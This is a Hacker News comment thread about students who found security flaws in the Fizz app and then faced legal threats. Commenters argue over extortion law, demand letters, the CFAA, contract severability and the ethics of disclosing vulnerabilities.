[HN Gopher] When your classmates threaten you with felony charges
       ___________________________________________________________________
        
       When your classmates threaten you with felony charges
        
       Author : epoch_100
       Score  : 377 points
       Date   : 2023-08-28 17:46 UTC (5 hours ago)
        
 (HTM) web link (miles.land)
 (TXT) w3m dump (miles.land)
        
       | seiferteric wrote:
        | How can you threaten someone with legal action and face no
        | consequences, but if you threaten someone with physical
        | violence you can go to jail?
        
         | vannevar wrote:
          | IANAL, but in some jurisdictions and circumstances I understand
         | that threatening someone with criminal prosecution can itself
         | constitute the crime of extortion or abuse of process.
        
         | tantalor wrote:
         | https://en.wikipedia.org/wiki/Monopoly_on_violence
        
         | gruez wrote:
         | IANAL, but:
         | 
         | 1. threatening violence is explicitly a crime
         | 
         | 2. at a higher level, threatening violence is a crime because
         | the underlying act (committing violence) is also a crime.
         | threatening to do a legal act is largely legal. it's not
         | illegal to threaten reporting to the authorities, for instance.
        
           | seiferteric wrote:
           | Seems like legal terrorism.
        
             | [deleted]
        
             | kube-system wrote:
             | Only for uses of the word 'terrorism' so hyperbolic as to
             | be meaningless.
        
               | seiferteric wrote:
               | Just pointing out the absurdity of it. I would much
               | rather get punched in the face than serve 20 years in
                | prison, yet it is illegal to threaten the former but
               | perfectly fine to threaten the latter.
        
               | gruez wrote:
               | >I would much rather get punched in the face than serve
                | 20 years in prison, yet it is illegal to threaten the
                | former but perfectly fine to threaten the latter.
               | 
               | How about you don't do the action that makes you
               | punishable with 20 years in prison?
               | 
               | On a more practical level, if someone is breaking into
               | your house, should it be illegal to tell them to stop, on
               | pain of you calling the police which presumably would
               | cause them to be incarcerated?
        
               | jstarfish wrote:
               | > On a more practical level, if someone is breaking into
               | your house, should it be illegal to tell them to stop, on
               | pain of you calling the police which presumably would
               | cause them to be incarcerated?
               | 
               | Not a lawyer, but there's a fine line between extortion
               | and not-extortion.
               | 
               | It's not extortion when you're making the threat to
               | either stop an illegal behavior or secure something you
               | already have rights to. Like, "I'm calling the cops if
               | you don't return the kids on the time/date we agreed on
               | in the goddamn divorce papers" is not extortion, because
               | you have a legitimate claim to defend.
               | 
                | It _is_ extortion when you're trying to use the threat
               | of law enforcement as a means of engineering consent or
               | coercing someone into doing something. Like, "I'm going
               | to call the cops and tell them about your shoplifting
               | unless you send me nudes/pay me $500/keep your mouth
               | shut." You can't leverage withheld knowledge of a crime
               | as a means of controlling someone. Otherwise it opens the
               | door to "Remember that time you raped me? You need to do
               | me another favor to make it right"-type of arrangements.
               | 
               | The first example would be extortion if the kids _were_
               | returned late but it was not reported, and the other
               | party continued _threatening_ to report it after the fact
               | to enforce future compliance.
        
               | seiferteric wrote:
               | No, because it would be legitimate? Just like it is
               | legitimate to use force to stop someone from hurting
               | you...
        
               | austhrow743 wrote:
               | The threatened party did the digital equivalent of
                | breaking into the threatener's house.
        
               | pessimizer wrote:
               | "It would be legitimate" is just an assertion. The entire
               | debate is about what is legitimate and what is not.
               | You're supposed to be saying _why_ things are or are not
               | legitimate, either legally or morally.
        
               | seiferteric wrote:
               | Sure, but if I shoot someone in self defense, there will
               | be an investigation and I have to show why I thought it
               | was legitimate. If a lawyer writes a baseless threatening
               | letter, at the very least I should be able to have the
               | bar association investigate.
        
               | kube-system wrote:
                | The person sending the letter has neither a prison nor
                | the power to put anyone in it. It is a persuasive
               | legal letter stating someone's opinion about what
               | _someone else_ could potentially do.
               | 
               | A more equal comparison might be "If you tease a gorilla
               | they might seriously hurt you"
        
               | kjjw wrote:
               | [flagged]
        
           | valbaca wrote:
           | > threatening to do a legal act is largely legal. it's not
           | illegal to threaten reporting to the authorities, for
           | instance.
           | 
           | It absolutely can be illegal, in the case of extortion. If
           | you say "do this or I turn you in" that's extortion.
        
           | [deleted]
        
         | dundarious wrote:
         | Your sentiment is silly. In general, with important caveats I
         | will not state here, you can of course voice a threat to do an
         | action that is legal (file a lawsuit), and may not voice a
         | threat to do an action that is illegal (physical assault).
        
           | valbaca wrote:
           | If it's a threat, then that's literally blackmail.
           | 
           | It's only legal to use the legal action, period. Once you
           | pull in a THREAT, it becomes blackmail/extortion.
        
             | dundarious wrote:
             | A cease and desist letter is a "threat" and is not
             | illegal/blackmail/extortion.
        
           | seiferteric wrote:
           | I'm not even suggesting it has to happen at a legal level,
           | but perhaps at a professional level, I would think any lawyer
           | writing baseless threatening letters to people should be
            | subject to losing their license.
        
             | kube-system wrote:
             | Writing a demand letter that leans in favor of your
             | client's interests is not only okay, it is the standard
             | course of action for a civil dispute.
             | 
             | https://www.law.cornell.edu/wex/demand_letter
        
               | seiferteric wrote:
               | Perhaps they shouldn't. If we lived in a world where
                | lawyers were more cautious about what they attached their
                | name to out of concern for losing their license, we would
               | probably be better off. Less bullying by corporations
               | with lots of money etc. No problems with demand letters
               | for legitimate issues that are well supported by evidence
               | though.
        
               | gruez wrote:
                | >If we lived in a world where lawyers were more cautious
                | about what they attached their name to out of concern for
                | losing their license, we would probably be better off.
               | 
               | That's already the case. Lawyers can be disbarred for
               | filing frivolous lawsuits.
        
               | seiferteric wrote:
               | I'm aware, and yet this letter was written and signed by
               | a lawyer who probably knew better and will likely face no
               | consequences.
        
               | pseg134 wrote:
               | You seem to have the facts of this case incorrect. They
               | definitely broke the law by hacking this app without
               | prior authorization. You may disagree with the law but I
               | don't understand how you made the leap to calling for the
               | suspension of specific attorneys.
        
               | dundarious wrote:
               | I'm in favor of the work done by the security
               | researchers, and the defense offered by the EFF. However,
                | your first comment reflected such a surface-level
                | understanding, and I wanted to bring it back to reality.
               | 
               | The general form of such a "legal threat" (threat
               | relating to the law) is perfectly reasonable, normal, and
                | _legal_ (as in, conforming to the law). It's a standard
               | part of practicing law.
               | 
               | However, in this specific case, they do appear to have
               | broken one _professional_ rule, regarding the threat of
               | criminal prosecution _conditional_ on a civil demand.
               | 
               | Aside from that one professional rule, the Fizz/Buzz
               | letter was probably perfectly technically accurate.
                | I doubt the DA would take up the case, but that's a
                | matter of their discretion and advice from the DoJ, not
                | the legal code.
               | 
               | I think Fizz/Buzz were incredibly foolish to send such a
               | letter, as the researchers were essentially good
                | Samaritans being punished for their good deed (probably
                | only because customers don't like it when supposedly
                | professional organizations are found to be in need of
                | such basic good deeds from good Samaritans, and Fizz/Buzz
                | would rather punish the good Samaritans instead of
               | "suffering" the "embarrassment" of public knowledge).
        
               | kube-system wrote:
                | The role of a lawyer is to make persuasive arguments in
                | their client's favor, and those arguments are supported
                | by evidence and legal opinions spanning a wide spectrum
                | of strength.
               | 
               | Completely baseless stuff can get lawyers disbarred, but
               | many things are shades of gray. The way the CFAA is
               | written, just about any security research on someone
               | else's machine that doesn't include "we got permission in
               | advance" often falls into this gray area.
               | 
               | The fact that the DOJ doesn't prosecute good-faith
               | security research is DOJ policy, not actual law. The law
               | as-written doesn't have a good-faith exemption.
        
               | kjjw wrote:
               | [flagged]
        
         | charonn0 wrote:
         | It's perfectly legal to threaten to do something that's
         | perfectly legal.
        
           | seiferteric wrote:
           | Perfectly legal, but unethical. The motives are clear, they
           | want to threaten/bully someone into silence who has
           | information that could hurt their business. I don't think
           | lawyers that engage in this behavior should be allowed to
           | practice law, that's all.
        
       | SenAnder wrote:
       | > And at the end of their threat they had a demand: don't ever
       | talk about your findings publicly. Essentially, if you agree to
       | silence, we won't pursue legal action.
       | 
       | Legally, can this cover talking to e.g. state prosecutors and the
       | police as well? Because claiming to be "100% secure", knowing you
       | are not secure, and your users have no protection against spying
       | from you or any minimally competent hacker, is fraud at minimum,
       | but closer to criminal wiretapping, since you're knowingly
       | tricking your users into revealing their secrets on your service,
       | thinking they are "100% secure".
       | 
       | That this ended "amicably" is frankly a miscarriage of justice -
       | the Fizz team should be facing fraud charges.
        
         | SoftTalker wrote:
         | They could be legitimately ignorant of their security
         | vulnerabilities. That might go to negligence more than fraud.
        
           | [deleted]
        
           | SenAnder wrote:
           | They could not have been ignorant of storing non-anonymous,
           | plain-text messages. Even if we don't count that as insecure,
           | they can only appeal to ignorance/negligence up until the
           | point the security researchers informed them of their
           | vulnerabilities.
           | 
           | After that, that they continued their "100% secure" marketing
           | on one side, while threatening researchers into silence on
           | the other, is plainly malicious.
        
         | manicennui wrote:
         | I don't think the demands of Fizz have much legal standing.
         | 
         | We care more about corporations than citizens in the US.
         | Advertising in the US is full of false claims. We ignore this
         | because we pretend like words have no meaning.
        
           | sleepybrett wrote:
            | There is a carve-out in the law for 'puffery', i.e.
            | exaggerations. So 'the best hamburger in town' would be
           | puffery.
        
             | manicennui wrote:
             | In the US?
        
               | esprehn wrote:
                | Yup. https://www.legalmatch.com/law-library/article/puffery-laws....
               | 
               | If a reasonable person would understand the claim to be
               | exaggeration (ex. World's best coffee) the law doesn't
               | consider it false advertising.
        
       | ryandrake wrote:
       | > One Friday night, we decided to explore whether Fizz was really
       | "100% secure" like they claimed. Well, dear reader, Fizz was not
       | 100% secure. In fact, they hardly had any security protections at
       | all.
       | 
        | It's practically a given that the actual security (or privacy)
        | of software is inversely proportional to its claimed security and
       | how loud those claims are. Also, the companies that pay the least
       | attention to security are always the ones who later, after the
       | breach, say "We take security very seriously..."
        
       | consoomer wrote:
       | In my opinion, they went too far and exposed themselves by
       | telling the company.
       | 
        | In all honesty, nothing good usually comes from that. If they
        | wanted the truth to be exposed, they would have been better off
        | exposing it anonymously to the company and/or public if needed.
       | 
       | It's one thing to happen upon a vulnerability in normal use and
       | report it. It's a different beast to gain access to servers you
       | don't own and start touching things.
        
       | dfxm12 wrote:
       | Anyone can make a threat. There's a bit of smarts needed to
       | classify a "threat" as credible or not. Only really a law
       | enforcement officer can credibly bring charges against you.
       | Unfortunately, we live in a society where someone with more money
        | than you can use the courts to harass you, so even if you
        | don't fear illegitimate felony charges, you can pretty much
        | get sued for any reason at any time, which brings with it
       | consequences if you don't have a lawyer to deal with it. So I
       | understand why someone might be scared in this situation, and
       | luckily they were able to find someone to work with them, _pro
       | bono_. I really wish the law had some pro-active mechanism for
       | dealing with this type of legal bullying.
        
       | datacruncher01 wrote:
       | Best advice I can give someone is never do security research for
        | a company without express written consent to do so, and document
        | everything as agreed.
       | 
       | Payouts for finding bugs when there isn't an already established
       | process are either not going to be worth your time or will be
       | seen as malicious activity.
        
       | [deleted]
        
       | mewse-hn wrote:
        | Crazy story. The Stanford Daily article has copies of the lawyer
        | letters back and forth; they are intense - and we wouldn't be
        | able to read them if the EFF hadn't stepped up.
       | 
       | https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
        
       | wang_li wrote:
       | Yet another example of someone security "testing" someone else's
       | servers/systems without permission. That's called hacking.
        | It doesn't matter whether you acted in "good faith" or not. It's
        | not your property, and you don't get to access it in ways the
        | owners don't want without being subject to potential civil and
        | criminal enforcement.
        
         | edwinjm wrote:
         | If they don't do it, criminals will do it. I know what my
         | preference is.
        
         | Buttons840 wrote:
         | Meanwhile companies leak the private data of millions of people
         | and nothing happens.
         | 
          | If a curious kid does a port scan, police will smash down doors.
         | People will face decades in prison.
         | 
         | If a negligent company leaks the private data of every single
         | American, well, gee, what could we have done more, we had that
         | one company do an audit and they didn't find anything and, gee,
          | we're just really sorry, so let's all move on and here's a free
         | year of credit monitoring which you may choose to continue
         | paying us for at the end of the free year.
        
         | SenAnder wrote:
         | Look at it from a consumer rights angle. A product is
         | advertised as having some feature ("100% security" in this
         | case), but nobody is allowed to test (even without causing any
         | harm) if that is true.
         | 
         | It's effectively legalizing fraud for a big chunk of computer
          | security. Sure, fraud itself is technically still illegal, but
         | so is exposing it.
        
       | hitekker wrote:
       | Interestingly, Ashton Cofer and Teddy Solomon of Fizz tried some
       | PR damage control when their wrongdoing came to light
       | https://stanforddaily.com/2022/11/01/opinion-fizz-previously....
       | Their response was weak and it seems like they've refused to
       | comment on the debacle since then.
        
         | mustacheemperor wrote:
         | Per the Stanford Daily article linked in the OP [0], they have
         | also removed the statement addressing this incident and
         | supposed improvements from their website.
         | 
         | >Although Fizz released a statement entitled "Security
         | Improvements Regarding Fizz" on Dec. 7, 2021, the page is no
         | longer navigable from Fizz's website or Google searches as of
         | the time of this article's publication.
         | 
         | And, it seems likely the app still stores personally
         | identifiable information about its "anonymous" users' activity.
         | 
         | > Moreover, we still don't know whether our data is internally
         | anonymized. The founders told The Daily last year that users
         | are identifiable to developers. Fizz's privacy policy implies
         | that this is still the case
         | 
         | I suppose the 'developers' may include the same founders who
         | have refused to comment on this, removed their company's
         | communications about it, and originally leveraged legal threats
         | over being caught marketing a completely leaky bucket as a
         | "100% secure social media app." Can't say I'm in a hurry to put
         | my information on Fizz.
        
           | omoikane wrote:
           | "Security Improvments Regarding Fizz":
           | 
            | https://web.archive.org/web/20220204044213/https://fizzsocia...
           | 
            | What I was looking for was whether they really had a page that
            | claimed "100% secure", but I don't think that was captured by
            | archive.org.
        
       | jbombadil wrote:
        | I don't understand why, in both contracts and legal communication
        | (particularly threatening ones), there is little to no consequence
        | for the writing party if they get things wrong.
       | 
       | I've seen examples of an employee contract, with things like "if
       | any piece of this contract is invalid it doesn't invalidate the
       | rest of the contract". The employer is basically trying to
       | enforce their rules (reasonable), but they have no negative
       | consequences if what they write is not allowed. At most a court
       | deems that piece invalid, but that's it. The onus is on the
       | reader to know (which tends to be a much weaker party).
       | 
       | Same here. Why can a company send a threatening letter ("you'll
        | go to federal prison for 20 years for this!!"), when it's clearly
       | false? Shouldn't there be an onus on the writer to ensure that
       | what they write is reasonable? And if it's absurdly and provably
       | wrong, shouldn't there be some negative consequences more than
       | "oh, nevermind"?
        
         | treis wrote:
         | These guys (at least according to the angry letter) went beyond
         | reasonable safe harbor for security researchers. They created
          | admin accounts and accessed data. It's definitely not clearly
          | false that there's liability here. Probably actually true.
        
         | convolvatron wrote:
         | I recently got supremely frustrated by this in civil
         | litigation. The claimant kept filing absolute fictional
         | nonsense with no justification, and I had to run around trying
         | to prove these things were not the case and racking up legal
          | fees the whole time. Apparently you can just say whatever you
         | want.
        
         | anigbrowl wrote:
         | Because contract law mostly views things through the lens of
         | property rights. Historically those with the most property get
         | the most rights, so they're able to get away with imposing
         | wildly asymmetrical terms on the implicit basis that society
         | will collapse if they're not allowed to.
        
         | mentalpiracy wrote:
         | > I've seen examples of an employee contract, with things like
         | "if any piece of this contract is invalid it doesn't invalidate
         | the rest of the contract".
         | 
         | This concept of severability exists in basically all contracts,
         | and is generally limited to sections that are not fundamental
         | to the nature of the agreement. (The extent of what qualifies
         | as fundamental is, as you said, up to a court to interpret.)
         | 
         | In your specific example of an employee contract, severability
         | actually protects you too, by ensuring all the other covenants
         | of your agreement - especially the ones that protect you as the
         | individual - will remain in force even if a sub section is
         | invalidated. Otherwise, if the whole contract were invalidated,
         | you'd be starting from nothing (and likely out of a job). Some
         | protections are better than zero.
        
           | Buttons840 wrote:
           | > especially the ones that protect you as the individual -
           | will remain in force even if a sub section is invalidated
           | 
           | In a right-to-work state, what protections can an individual
           | realistically expect to receive from a contract?
        
             | mentalpiracy wrote:
             | An employment contract is intended to backstop everything
             | you were promised or negotiated during the hiring process.
             | It doesn't really matter if you're in a right-to-work state
              | or not; an employment contract provides you with recourse
             | if the terms are not upheld by your employer. In the case
             | of a breach, that is something you can remedy in court.
             | (Whether or not it is worthwhile to pursue that legal case
             | depends entirely on the context)
             | 
             | * anything you negotiated during hiring like RSU or sign-on
             | bonuses
             | 
             | * stating your salary, benefits, vacation is the basis for
             | protecting you from theft of that compensation.
             | 
             | * IP ownership clauses can protect your independent, off
             | the clock work
             | 
             | * work location, if you are hired remote and then
             | threatened with termination due to new RTO policies
             | 
             | I am just pulling from the top of my head general examples.
        
             | abduhl wrote:
             | The employment of an individual that has an employment
             | contract is governed by the strictest set of rules between
             | the right-to-work state's laws and the employment contract.
             | Literally every permissible provision of an employment
             | contract can be a protection: golden parachutes, vacation
             | days, sick days, payout of the same, IP guarantees for
             | hobby work, employment benefits, etc.
             | 
             | Right to work at its most generic level means freedom from
             | being forced into a union, not freedom from being held to a
             | contract.
        
               | feoren wrote:
               | > golden parachutes
               | 
               | Nobody has these except top execs who are already in a
               | huge position of power.
               | 
               | > vacation days, sick days, payout of the same
               | 
               | Nope, not anymore: nothing is guaranteed with "flexible
               | time off". I literally cannot meet my performance goal if
               | I take more than 1 day of sick/vacation day PER YEAR.
               | Yes, my raises are tied to this performance goal. Yes,
               | it's probably illegal, but who cares? Nobody is ever
               | going to do anything about it. This is every company with
               | FTO. Who gets "paid out" for PTO anymore?
               | 
               | > IP guarantees for hobby work
               | 
               | You're joking, right? Most employment contracts claim
               | that they own the slam poetry you write on your napkin at
               | 2:00 am on a Saturday while high on your couch. Every
               | mention of IP in an employment contract is as greedy as
               | possible.
               | 
               | > employment benefits
               | 
               | Ok but in a right to work state these can be terminated
               | any time anyway.
               | 
               | Literally nothing about an employment contract is ever
               | written in favor of the actual employee. Of course it's
               | not: _they wrote it_. If every company in an industry
               | does this and they all refuse to negotiate, workers have
                | no choice but to sign it. It's crazy to me to think that
               | a U.S. company would voluntarily ever do anything in the
               | interest of any of its employees, ever. This is the whole
               | reason why ambiguities are supposed to go in favor of the
                | party that _didn't_ write it. Voiding any part of an
               | employee contract can therefore only ever benefit the
               | employee (except possibly the part where they get paid).
               | If you want protections for employees, look to regulation
               | and unions, not contracts written by the employer.
        
               | [deleted]
        
               | abduhl wrote:
               | I don't know what to say in response to your complaints
               | except negotiate better working conditions next time you
               | get hired. The company wrote it. You accepted it. You can
               | always ask for different terms and walk away if they
               | don't agree, start your own company, or change industries
               | to one where companies are willing to negotiate.
               | 
               | If you want protections for employees, sure you can
               | (erroneously, in my opinion) look to unions. If you want
               | protections for yourself, look to negotiate.
        
               | _dain_ wrote:
               | _> I literally cannot meet my performance goal if I take
                | more than 1 day of sick/vacation day PER YEAR._
               | 
               | why not get another job?
        
               | feoren wrote:
               | Because for all the bullshit I have to put up with, and
               | all the things I hate about management, and all the
               | things that could easily be better but for one asshole
               | vice-president needing to cosplay Business Hero ... for
               | all of that, the job is _deeply interesting_ and I learn
               | a ton every day. And virtually every other job on the
               | market is mind-numbingly boring and pointless.
               | 
               | And because I like my immediate teammates a lot.
               | 
               | And because the issues I'm railing against are incredibly
               | pervasive in most companies in the United States and
               | probably beyond. Our capitalism has been completely taken
               | over by a caste of parasitic leeches who enshittify
               | everything they touch and I am under no illusion that any
               | other job would be any different.
               | 
               | But I do also look for other jobs regularly. Finding a
               | job that is both interesting (<1%) and not full of
               | shithead management (<5%) is about 1 in 2,000.
        
               | [deleted]
        
             | ZoomerCretin wrote:
             | "Right-to-Work" refers to the inability of unions to
             | negotiate closed shops, where all employees of that "shop"
             | must be part of the union.
             | 
             | You're thinking of "At-Will" employment, which allows
             | employees and employers to end an employment relationship
             | at any time for any (except for the few illegal) reasons.
        
           | ipaddr wrote:
            | But then your dismissal will be governed by common law, which
            | could mean years of back pay depending on where you live.
        
         | LastTrain wrote:
         | There can be consequences, but you have to be able to
         | demonstrate you have been harmed. So, in what way have you been
         | harmed by such a threat, and what is just compensation? How
         | much will it cost to hire a lawyer to sue for compensation, and
         | what are your chances of success? These are the same kinds of
         | questions the entity sending the threatening letter asked
         | themselves as well. If you think it is unfair because they have
         | more resources, well that is more of a general societal problem
         | - if you have more money you have access to better justice in
         | all forms.
        
         | fallingknife wrote:
         | That's not the language they use. It will be more like "your
         | actions may violate (law ref) and if convicted, penalties may
         | be up to 20 years in prison." And how do you keep people from
         | saying that? It's basically a statement of fact. If you have a
         | problem with this, then your issue is with Congress for writing
         | such a vague law.
        
           | SilasX wrote:
           | "That's not the language they used. They simply admired your
           | place of business and reflected on what a shame it would be
           | if a negative event happened to it. How would you keep people
           | from saying that? It's basically a statement of fact..."
        
           | arrosenberg wrote:
           | No, you are talking about criminal law. What OP is talking
           | about is severability, which exists so that if a judge
           | determines Clause X violates the law, they can still
            | (attempt to) enforce the rest of the contract if X can be
            | easily remedied. E.g., the contract says no lunch breaks but
            | CalOSHA regulations require 30 minutes; the contractor
            | can't void the contract in its entirety, they just take
            | the breaks and amend the contract if the employer pushes it.
           | 
           | I disagree with OP - a judge can always choose to invalidate
           | a contract, regardless of severability. It is in there for
           | the convenience of the parties, and I've not heard of it
           | being used in bad faith.
        
           | ender341341 wrote:
            | You can read the language they do use here:
            | https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
           | 
            | They threatened that if they received written confirmation
            | that the researchers wouldn't discuss the security issues,
            | they wouldn't pursue charges.
           | 
           | The lawyers were very much not "for your information you
           | could be liable for x if someone responded poorly", they were
           | in fact responding poorly.
        
         | bagels wrote:
         | Even if you get it right, the court can change what is right at
         | any time by ruling differently than last time.
        
         | gingerrr wrote:
         | > "if any piece of this contract is invalid it doesn't
         | invalidate the rest of the contract".
         | 
         | Severability (the ability to "sever" part of a contract,
         | leaving the remainder intact so long as it's not fundamentally
         | a change to the contract's terms) comes from constitutional law
         | and was intended to prevent wholesale overturning of previous
         | precedent with each new case. It protects _both_ parties from
         | squirreling out of an entire legal obligation on a
         | technicality, or writing poison pills into a contract you know
          | won't stand up to legal scrutiny.
         | 
         | If part of the contract is invalidated, they can't leverage it.
         | If that part being invalidated changes the contract
         | fundamentally, the entire contract is voided. What more do you
         | want?
         | 
         | It seems like you're arguing for some sort of _punitive_
         | response to authoring a bad contract? That seems like a pretty
          | awful idea re: chilling effect on all legal/business
         | relationship formation, and wouldn't that likely impact the
         | weaker parties worse as they have less access to high-powered
         | legal authors? That means that even negotiating wording changes
         | to a contract becomes a liability nightmare for the
         | negotiators, doesn't that make the potential liability burden
         | even more lopsided against small actors sitting across the
         | table from entire legal teams?
         | 
         | I guess I'm having trouble seeing how the world you're
         | imagining wouldn't end up introducing bigger risk for weaker
         | parties than the world we're already in.
        
           | cj wrote:
           | Practical example: your employment agreement has a non-
           | compete clause. If 3 years later non-competes are no longer
           | allowed in employment contracts, you won't want to be
           | suddenly unemployed because your employment contract is no
           | longer valid.
           | 
           | You'll want the originally negotiated contract, minus the
           | clause that can't be enforced.
        
           | jbombadil wrote:
           | Thanks for the explanation and the term "severability". I
           | understand its point now and it makes sense to have it
           | conceptually. I also didn't know about this part: > so long
           | as it's not fundamentally a change to the contract's terms
           | 
           | However, taken down one notch from theoretical to more
           | practical:
           | 
           | > It seems like you're arguing for some sort of punitive
           | response to authoring a bad contract?
           | 
           | Not quite so bluntly, but yes. There's obviously a gray area
            | here. So not for mistakes or subtle technicalities. But if one
           | party is being intentionally or absurdly overreaching then
           | yes, I believe there should be some proportional punishment.
            | Particularly if the writing party is driven more by an intent
            | to scare the other side into inaction than by a genuine belief
            | that their wording is true.
           | 
           | The way I think of it is maybe in similar terms as disbarring
           | or something like that. So not something that would be a day-
           | to-day concern for honest people doing honest work, but some
           | potential negative consequences if "you're taking it too far"
           | (of course this last bit is completely handwavy).
           | 
           | Maybe such a mechanism exists that I'm not aware of.
        
             | gingerrr wrote:
             | I do like the idea theoretically as a deterrent against bad
             | actors abusing the law to bully weaker parties - but the
             | difficult part is in the details of implementation: how do
             | you separate intent to abuse from incompetence?
             | 
             | Also confusing the mix here is who you are punishing when
             | violations are found - is it the attorneys drafting the
             | agreement? They're as likely to be unaffiliated with the
              | company executing the contract as not; not everyone bothers
             | with in-house counsel. Is it the company leadership
             | forwarding the contract?
             | 
             | What's the scope of the punishment? An embargo on all new
             | legal agreements for a period of time, or only with the
             | parties to the bad contract? A requirement for change in
             | legal representation? Now we get into overreach questions
             | on the punishment side.
             | 
             | All of that to say I am guessing the reason something like
              | this _doesn't_ exist yet afaik is because it's a
             | logistical nightmare to actually put into practice.
             | 
             | The closest I can think of to something that might work is
             | like a credit score/rating for companies for "contract
             | integrity" or something that goes down with negative
             | rulings - but what 3rd party would own that? Even just the
             | thought experiment spawns too many subqueries to resolve
             | simply.
             | 
             | None of that contradicts the fact it's a good idea - just
             | not sure if even possible to bring to life!
        
             | nostrademons wrote:
             | I'm reminded of the concept of a "tact filter", which is
             | basically "do you alter what you say to avoid causing
             | offense, or do you alter what you hear to avoid taking
             | offense?"
             | 
             | https://www.mit.edu/~jcb/tact.html
             | 
             | The part the original essay leaves out is that _optimal
             | behavior depends on the scale and persistence of the
             | relationship_. In personal, 1:1, long-term relationships,
             | you should apply outgoing tact filters because if you cause
              | offense you've torched the relationship permanently and
             | will suffer long-term consequences from it. But in public
             | discourse, many-to-many, transactional relationships, it's
             | better to apply _incoming_ tact filters because there are
             | so many people you interact with that invariably there will
             | be someone who forgot to set their outgoing tact filter.
             | (And in public discourse where you have longstanding
             | relationships with your customers with serious negative
             | consequences for pissing them off, you want to be _very,
             | very careful_ what you say. The entire field of PR is
             | devoted to this.)
             | 
             | So anyone who spends a significant amount of time with the
             | general public basically needs to develop a translation
             | layer. "i hope you hang yourself" on an Internet forum
             | becomes "somebody had a bad day and is letting off steam by
             | trolling." "Your business is probably in violation of
             | federal labor laws because you haven't displayed these $400
             | posters we're trying to sell you" becomes "Better download
             | some PDFs off the Department of Labor for free" [1]. "We're
             | calling from XYZ Collection Agency about your debt" or
             | "This is the Deputy Sheriffs office. You have a warrant out
             | for your arrest for failing to appear for jury duty" or
             | "This is the IRS calling requesting you pay back taxes in
             | the amount of $X over the phone" = ignore them and hang up
             | because it's a scam. "Continued involvement in Russia's
             | internal affairs will lead to nuclear consequences" = Putin
             | is feeling insecure with his base and needs to rattle some
             | sabers to maintain support. "You are in violation of
             | several state and federal laws facing up to 20 years in
             | prison" = they want something from me, lawyer up and make
             | sure we're not in violation and then let's negotiate.
             | 
             | [1] https://www.dol.gov/general/topics/posters
        
         | bdowling wrote:
         | It's a balance between encouraging people to stand up for their
         | rights on one hand and discouraging filing of frivolous
         | lawsuits on the other. The American system is "everyone pays
         | their own legal fees", which encourages injured parties to
         | file. The U.K. on the other hand is a "loser pays both parties'
         | legal fees" (generally), which discourages a lot of plaintiffs
         | from filing, even when they have been significantly harmed.
        
         | MajimasEyepatch wrote:
         | There is obviously such a thing as going too far, but it's kind
         | of hard to draw a clear line. In a good faith context, laws and
         | precedents can change quickly, sometimes based on the whim of a
         | judge, and there are many areas of law where there is no clear
         | precedent or where guidance is fuzzy. In those cases, it's
         | important to have severability so that entire contracts don't
         | have to be renegotiated because one small clause didn't hold up
         | in court.
         | 
         | Imagine an employment contract that contains a non-compete
         | clause (ignore, for a moment, your personal beliefs about non-
         | compete clauses). The company may have a single employment
         | contract that they use everywhere, and so in states where non-
         | competes are illegal, the severability clause allows them to
         | avoid having separate contracts for each jurisdiction. And now
         | suppose that a state that once allowed non-competes passes a
         | law banning them: should every employment contract with a non-
         | compete clause suddenly become null and void? Of course not.
         | That's what severability is for.
         | 
         | In the case in the OP, it's hard to say what the context is of
         | the threat, but I imagine something along the lines of,
         | "Unauthorized access to our computer network is a federal crime
         | under statute XYZ punishable by up to 20 years in prison."
         | Scary as hell to a layperson, but it's not strictly speaking
         | untrue, even if most lawyers would roll their eyes and say that
         | they're full of shit. Sure, it's misleading, and a bad actor
         | could easily take it too far, but it's hard to know exactly
         | where to draw the line if lawyers couch a threat in enough
         | qualifiers.
         | 
         | At the end of the day, documents like this are written by
         | lawyers in legalese that's not designed for ordinary people.
         | It's shitty that they threatened some college students with
         | this, and whatever lawyer did write and send this letter on
         | behalf of the company gave that company tremendously poor
         | advice. I guess you could complain to the bar, but it would be
         | very hard to make a compelling case in a situation like this.
         | 
         | (This is also one of the reasons why collective bargaining is
         | so valuable. A union can afford legal representation to go toe
         | to toe with the company's lawyers. Individual employees can't
         | do that.)
        
           | notpushkin wrote:
           | > At the end of the day, documents like this are written by
           | lawyers in legalese that's not designed for ordinary people.
           | 
           | Does it have to be this way?
        
             | ipaddr wrote:
              | Without a common language with exact meanings for phrases
              | that are accepted by both parties, contracts would be
              | impossible to enforce and would become useless.
        
       | 1970-01-01 wrote:
       | Ethically, they did the good thing by challenging the "100%
       | secure" claim. Legally, they were hacking (without permission).
       | Very high praise to the EFF for getting them out of trouble. Go
       | donate.
        
       | sublinear wrote:
       | > Stay calm. I can't tell you how much I wanted to curse out the
       | Fizz team over email. But no. We had to keep it professional --
       | even as they resorted to legal scare tactics. Your goal when you
       | get a legal threat is to stay out of trouble. To resolve the
       | situation. That's it. _The temporary satisfaction of saying "fuck
       | you" isn't worth giving up the possibility of an amicable
       | resolution._
       | 
       | Maybe it's because I'm getting old, but it would never cross my
       | mind to take any of this personally.
       | 
       | If they're this bad at security, this bad at marketing, and then
       | respond to a fairly standard vulnerability disclosure with legal
       | threats it's pretty clear they have no idea what they're doing.
       | 
       | Being the "good guy" can sometimes be harder than being the "bad
       | guy", but suppressing your emotions is a basic requirement for
       | being either "guy".
        
         | kdmccormick wrote:
         | > Maybe it's because I'm getting old
         | 
         | Yup, that's it :) These kids are either in college or just
         | graduated. They were smart enough to get themselves legal help
         | before saying anything stupid, which is impressive. Cut them
         | some slack!
        
         | ngai_aku wrote:
         | > If they're this bad at security, this bad at marketing, and
         | then respond to a fairly standard vulnerability disclosure with
         | legal threats it's pretty clear they have no idea what they're
         | doing.
         | 
         | And yet, according to the linked article in the Stanford Daily,
          | they received $4.5 million in funding.
        
       | pie_R_sqrd wrote:
       | Interesting. My school has a very similar platform, SideChat,
       | which I doubt is much different. Makes me wonder how much they
       | know about me, as I was permanently banned last year for
       | questioning the validity of "gender-affirming care."
        
         | Zone3513 wrote:
         | [flagged]
        
       | withinrafael wrote:
       | The article asserts "there are an increasing number of resources
       | available to good-faith security researchers who face legal
       | threats". Is there an example of such, outside of the EFF? How do
       | beginners find them?
        
       | [deleted]
        
       | f0e4c2f7 wrote:
       | I feel like this article reflects an overall positive change in
       | the way disclosure is handled today. Back in the 90s this was the
       | sort of thing every company did. Companies would threaten
       | lawsuits, or disclosure in the first place seemed legally
       | dubious. Discussions in forums / BBS's would be around if it was
       | safe to disclose at all. Suggestions of anonymous email accounts
       | and that sort of thing.
